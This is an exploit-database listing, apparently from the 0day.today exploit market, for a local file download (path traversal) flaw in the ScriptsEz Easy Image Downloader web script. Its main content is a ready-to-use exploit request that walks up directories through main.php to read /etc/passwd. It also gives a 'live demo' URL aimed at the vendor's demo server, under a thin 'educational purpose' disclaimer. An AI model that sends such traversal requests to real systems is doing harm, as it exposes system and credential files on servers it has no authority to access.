[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ScriptsEz Easy Image Downloader Local File Download Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3868
Category
web applications
Date add
08-10-2008
Platform
unsorted
=================================================================
ScriptsEz Easy Image Downloader Local File Download Vulnerability
=================================================================


# ScriptsEz Easy Image Downloader Local File Download Vulnerability
# url: http://www.scriptsez.net/
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

PoC:     /main.php?action=download&id=[FILE]
Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd

live demo:
http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd



#  0day.today [2024-11-16]  #